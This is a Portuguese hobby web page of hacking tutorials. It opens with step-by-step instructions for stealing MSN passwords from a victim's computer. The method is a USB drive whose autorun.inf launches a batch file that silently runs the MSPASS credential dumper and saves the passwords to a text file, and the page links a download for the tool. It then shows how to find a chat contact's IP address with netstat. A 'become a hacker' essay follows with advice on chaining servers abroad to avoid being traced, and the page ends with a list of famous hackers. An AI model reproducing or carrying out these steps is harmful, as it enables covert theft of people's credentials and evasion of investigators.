Sites Grátis no Comunidades.net Criar um Site Grátis Fantástico

---> Clube Dos Downloads <---




Parceiros










Total de visitas: 40674
Tutoriais

Capturando Senhas De MSN




Em resumo, o que é?
Bom, aqui, você vai precisar de ter acesso físico no computador da vítima. PODE ser que você não tenha tanta praticidade ou conhece outros meios de fazer isso. A vantagem deste meio para os outros, é que este é muito rápido e discreto. As vezes nem exige engenharia social. Eu estou falando de um Pen Drive. Funciona, basicamente, assim: você coloca o Pen Drive no computador da vítima, dá OK e tira. Não leva cinco segundos. Quando você chegar em sua casa, você abre a PASTA do seu pen drive, sem executar o programa indicado por ele, e vê a senha, que será salva em um documento de texto.


Materiais Necessários: Um Pen Drive, um programa chamado MSPASS e um computador.

Baixe o MSPASS em http://rapidshare.com/files/145184955/mspass_by_magneto.rar.html e a senha para descompactar é hack-one.org/forum.

Vamos a prática:
Em seu Pen Drive, crie uma pasta com um nome qualquer de sua escolha. Neste tutorial, vou usar ForumInvaders como exemplo. Coloque o MSPASS lá. O interessante do MSPASS é que ele responde a comandos também no DoS, então vamos fazer um BAT que faça ele falar a senha. Vá em INICIAR >> EXECUTAR >> CMD.

Digite:
copy con autorun.bat
start ForumInvadersmspass.exe /stext senha.txt

Dê Ctrl + C para interromper a operação e feche. Então está tudo OK. Ou Quase. Falta criar o Autorun.inf. Crie no bloco de notas um arquivo com os seguintes dados:

[autorun]
open=autorun.bat
ACTION = UmNomeDeSuaEscolhaParaAparecer


E salve como autorun.inf

Tudo OK. Agora vamos testar. Pode ser em sua própria máquina. Coloque seu PenDrive no USB e pronto. Depois é só verificar o conteúdo do PenDrive e ver que sua senha estará em senha.txt.




Descubra Os IPs De Seus Contactos MSN [Simples]


| PegaR IP pelo ms-dos

EnviaS 1 arquivo para a vítima por msn
fechaS TODAS as CoiSaS q tem conexão a internet que estejam abertas no seu pc (compartilhador de arquivo, páginas de internet, jogos online, etc...)
só deixas a janela de conversa sua e de seu amigo
quando estiveres a enviar o arquivo
vais em iniciar > executar > cmd
irá abrir o MS-Dos
agora digitas "netstat -n" (sem aspas)
irá aparecer alguns IP's a direita >>>
tentas todos
mas o mais provavel eh o penultimo
ou os que começam com 200 ou 201.





Conceitos De Como Se Tornar Um Hacker




Como me Transformar em um Hacker?

Parece que muitas e muitas pessoas, todos os dias fazem esta pergunta em grupos de notàcias, através de e-mail, em salas de chat. Não hí nenhuma resposta simples, desde que cada um deve seguir seu próprio caminho. Mas hí uma coisa que você deve ter para almejar o status de um hacker: determinação! Você deve ter um apetite voraz para encontrar informação e ensinar a si mesmo. Você não pode contar com outros, não pode contar com a escola. O curso de digitação não o levarí a lugar algum.

Conseguindo Ajuda

É verdade que existe centenas e centenas de home pages de "hackers" na Internet. Se você nunca tentou enviar um e-mail para algum deles, uma coisa certamente se torna evidente, a falta de conhecimento. Qualquer pessoa (eu inclusive!) pode colocar uma pígina na Internet, adicionando links, textos,... de outros e se chamar um hacker. Mas peça por ajuda para escrever um shel script para explorar um bug e você ficarí ligeiramente disapontado. Claro! hí alguns hackers genuinos por aà, e se você conseguir encontrí-los, poderí pedir ajuda. Mas aà você estarí dependendo de alguém para tudo. Um hacker deve ser autoditada.

Algumas Outras Necessidades

É importante saber e aceitar que você estarí sob fogo, quando outros ouvirem sobre o seu interesse em se tornar um hacker. É para ser esperado: você estí tentando ser parte de uma minoria que é odiada pelo grande público da írea, por causa de imagem ruim que é comumente difundida. Deve discordar de comentírios negativos e de julgamentos apressados. E finalmente, você deve ser humilde para se tornar um hacker. É absolutamente necessírio admitir que você sabe apenas 1 por cento do que hí para se saber sobre o mundo da informítica e seus pecados, no objetivo de sempre direcionar seus esforços para aprender mais. Alguma vez, jí notou que pessoas com grandes egos são idiotas ? Adivinhe por que ? Se você acha que sabe tudo, por que se encomodar em continuara aprendendo ? Um hacker tem um desejo insaciível por informação, são obssesivos sobre tudo, sejam redes telefônicas, internet, computadores ou qualquer coisa. É por este motivo que um hacker, constantemente, "explora" por mais informação. Então você precisa de tempo livre para se dedicar ao aprendizado. E o que você deve aprender ?

Tomando Os Primeiros Passos

Um conceito errado sobre hackers é que você deve ser um gênio em programação. Isto não é verdade! Claro, que quanto mais você souber melhor. Você precisa realmente saber algum shell scripting e linguagem C, bísicos. Aqui o que eu acredito ser o mais essencial no aprendizado de um hacker: Primeiro, você deve aprender sobre o sistema operacional UNIX. Ele é um dos sistemas operacionais mais usados em servidores na Internet. Acessando um sistema UNIX via Telnet ou um terminal de cliente, não irí apresentar-lhe uma interface grífica interessante, é um ambiente de somente texto, como o DOS. Não hí gríficos, apenas um simples e extremamente eficiente sistema operacional que estí muito a frente de seu tempo, desde quando foi criado. É claro que você poderí encontrar o X-Windows em míquinas Unix e rodar uma enorme variedade de aplicativos gríficos, mas é irrelevante para esta discussão. Você precisa ter um conhecimento complexo do sistema operacional. Sabendo como ele funciona em detalhes, é essencial. O código-fonte é distribuàdo gratuitamente para UNIX e seus variantes, e desta forma você deve estudí-lo. Compre livros, procure pela internet, consiga informações de todas as fontes que puder. Apenas esteja apto a usar o UNIX como se o usasse por toda a sua vida. Muitas pessoas esquecem as lições bísicas e acham que precisam aprender apenas sobre as medidas de segurança do sistema operacional. Isto é fútil, como você poderí "penetrar" em um sistema se você não sabe usí-lo para simples tarefas rudimentares, como trocar diretórios, listar arquivos, ver quem estí conectado, etc,... Além disso, como mencionei anteriormente, você precisa ter experiência em shell scripting. Quanto melhor nisso, você for, melhor e mais completo hacker você serí. Saber também um pouco de linguagem C é também imperativo, desde que você irí precisar de alterar códigos, programação de socket para a técnica de spoofing e ataques fragmentados,... Uma vez que você saiba os fundamentos do UNIX, aprenda sobre as suas funções primírias de rede com protocolos da Internet. É essencial entender como um computador comunica-se com outro pela Internet. O próximo passo é aprender especialmente sobre segurança em sistemas UNIX, que incluem o design das permissões de acesso e firewall. Novamente, todas estas informações podem ser encontradas nas mígicas coisas chamadas livros.
Agora que você tem um entendimento total sobre UNIX, você poderí aprender como contornar a segurança nestes sistemas. Existem vírios arquivos na Internet tratando sobre os últimos bugs, como o bugtraq e 8lgm.org. Comece a mater uma trilha imaginíria nas falhas em vírios serviços, e então quando você inspecionar um sistema ele irí surgir em sua mente.

A Psicologia de Hacke(ar)

É importante entender como o cérebro humano funciona em outras pessoas. Para se ter uma ideia de como comprometer a segurança de computadores, você deve "penetrar" na mente do administrador do sistema e pensar como você protegeria o sistema se fosse o encarregado. Você deve também levar em consideração que a muitas das pessoas são estúpidas, e isto serí decisivo se você estiver tentando descobrir algumas senhas. Use o senso comum.

Nunca Pare de Aprender

Não pare aqui! Depois de entender sobre redes e UNIX, continue aprendendo mais. O que sobrou ? VAX/VMS, que é outro sistema operacional encontrado em alguns computadores conectados na Internet. Você pode começar explorando o mundo da criptografia (o que é suicàdio se você odeia matemítica). Mantenha-se atualizado nos novos desenvolvimentos em tecnologia. Simplificando: aprenda tudo o que puder todo dia.
Eis algumas abilidades de Kevin Mitnick (talvez o mais famoso hacker de todos os tempos): VM/CMS, OS/VS1, DOS/VSE, MS-DOS, RST/E, VAX/VMS, UNIX, TOP-20,... Familiarizado com algum destes ? Isto só nos faz pensar em uma coisa, vamos estudar!!!

Fazendo a Conexão

Constantemente, escuta-se uma pergunta MUITO comum dos iniciantes: "Como eu me conecto a um sistema ?" ou "Como eu uso o Telnet ?" Para explicar algumas questões bísicas: Você pode se conectar com qualquer míquina ligada na Internet com um programa de Telnet. Muitos programas utilizam o serviço de telnet quando você conecta-se a uma míquina. Por exemplo, se eu rodar meu programa e conectar com o xyz.com, ele irí me conectar com a porta 23, a porta da Telnet do xyz.com. Telnet, simplesmente, é um meio de se usar um terminal UNIX, como se você estivesse sentado em frente a um. Imagine estar discando em uma míquina em ambiente DOS e recebendo o prompt C:>. É essencialmente a mesma coisa. Quando você aprender sobre UNIX, você verí que existem outros serviços (também conhecido como dameons), e poderí usar um programa de Telnet para conectar-se a vírios deles. Onde encontrar tais programas ? Que tal em http://www.tucows.com/, eles possuem vírios deles.

Se você puder instalar uma variação do UNIX como o LINUX em seu computador, eu certamente sugiro-lhe que o faça. Este é o melhor caminho para aprender o sistema operacional. Além disso, o LINUX possui excelentes utilitírios que o acompanham, como o GNU C compiler.

Também é importante identificar um erro comum que os iniciantes cometem quando aprendem por arquivos de texto. Não confundam TELENET com TELNET. TELENET é uma grande rede de servidores, agora também conhecido como SprintNet. Possui um sistema operacional especial e é acessado por números de acesso discado com um programa de terminal. Uma vez conectado você pode acessar diferentes servidores pelo seu NUA (Network User Address). Hacke(ar) em redes como SprintNet/Telenet é uma prítica arriscada, por ser fícilmente rastreada. Você estí discado diretamente na rede de sua linha telefônica. Novamente, um servidor pode simplesmente gravar o seu endereço IP se você conectar-se na Internet e usar a identificação de cliente para possivelmente conseguir o seu username do seu provedor.

Como Não Ser Pego

O erro que provavelmente todo hacker comete é que ele ou ela torna-se muito convencido ou popular. Não saia gritando que é um hacker na escola. Confie em menos pessoas posàveis. Quanto menos pessoas souberem que você estí nisso, melhor. Não faça coisas idiotas, como hacke(ar) da sua própria casa a algum sistema de alta segurança. Embora este método estí agora, "fora de moda", desde que existem meios mais fíceis de esconder sua identidade quando hack(eando) pela Internet. Existem vírios meios para dificultar o rastreamento quando hack(eando) sistemas da Internet. Um deles, é conectar-se em diversos servidores com Telnet antes de acertar o seu alvo. Isto tornarí o rastreamento muito mais difàcil. Tente conectar-se a sistemas localizados em outros paàses. Nunca tente hack(ear) uma instituição governamental, você irí ser pego e irí para a cadeia! Não seja estúpido achando ser bom demais para ser pego. Nunca fale sobre hack(ear) ao telefone principalmente nos sem fio, você nunca sabe quem estí ouvindo. Encripte suas mensagens de e-mail. Seja um pouco paranoico! Quanto mais paranoico você for, menos chance você terí de ser pego.

Último, Mas Muito Importante

Sempre digo que conhecimento é apenas metade do que faz um hacker. A outra metade é a ética. Você pode ser um perfeito gênio, mas se não tiver ética, você estí no mesmo nàvel de um criminoso. Todo hacker possui um código de ética.




Hackers Que Fizeram História




| Kevin Mitnick (Condor)
O mais famoso dos hackers chegou a roubar 20 mil números de cartões crédito e passeava pelo sistema telefônico dos EUA com total desenvoltura. Foi o primeiro hacker a entrar para a lista dos dez criminosos mais procurados pelo FBI. Depois de quatro anos de prisão. Mitnick está agora em liberdade e tem uma empresa que presta consultoria em segurança de sistemas.

Tsutomu Shimomura
Tsutomu Shimomura é um cientista da computação e hacker notório. Teve grande influencia na captura de Kevin Mitnick, um dos maiores crackers de todos os tempos. Escreveu o livro “Contra-ataque”, em que conta como ajudou a prender Mitnick.

Kevin Poulsen (Watchman)
Kevin Poulsen, o Watchman, amigo de Mitnick, era um simples especialista em telefonia de rara habilidade. Em 1990, ganhou um Porsche num concurso realizado por uma emissora de rádio da Califórnia. O prêmio era para o 102º ouvinte que telefonasse. Poulsen invadiu a central telefônica, interceptou as ligações e garantiu seu prêmio. Passou quatro anos na prisão e hoje é diretor do site Security Focus.

John Draper (Captain Crunch)
John Draper, o Captain Crunch, é considerado o inventor do phreaking. No início dos anos 80, ele usava um simples apito de plástico para produzir o tom de 2.600 Hz, capaz de enganar o sistema telefônico americano. Assim, fazia ligações de graça.

Johan Helsingius (Julf)
O filandês é responsável por um dos mais famosos servidores de e-mail anônimo. Foi preso após se recusar a fornecer dados de um acesso que publicou documentos secretos da Church of Scientology na Internet. Tinha para isso um 486 com HD de 200Mb, e nunca precisou usar seu próprio servidor.

Vladimir Levin (Rússia)
O russo Vladimir Levin é o ladrão digital mais notório da história. Ele liderou uma gangue russa que invadiu os computadores do Citibank e desviou US$ 10 milhões de contas de clientes. Levin foi preso na Inglaterra, quando tentava fugir do país. Ele dizia que um dos advogados alocados para defendê-lo era, na verdade, um agente do FBI.

Ehud Tenebaum (Analyser)
O israelense Ehud Tenebaum, o Analyser, foi preso em 1998, após ter participado de um bem-organizado ataque contra os computadores do Pentágono. Seus companheiros de conspiração eram dois jovens de Israel e mais dois da Califórnia.

Mike Calce (Mafiaboy)
Aos 15 anos, o canadense Mike Calce, o Mafiaboy, confessou ter orquestrado os ataques de indisponibilidade de serviço que derrubaram sites como Yahoo!, CNN e ZD Net em fevereiro de 2001. Ele foi sentenciado a 8 meses de prisão, por ter acarretado um prejuízo estimado em US$ 1,2 milhão. Ele é um exemplo de script kid. Alardeou tanto os seus feitos, que acabou sendo preso por isso.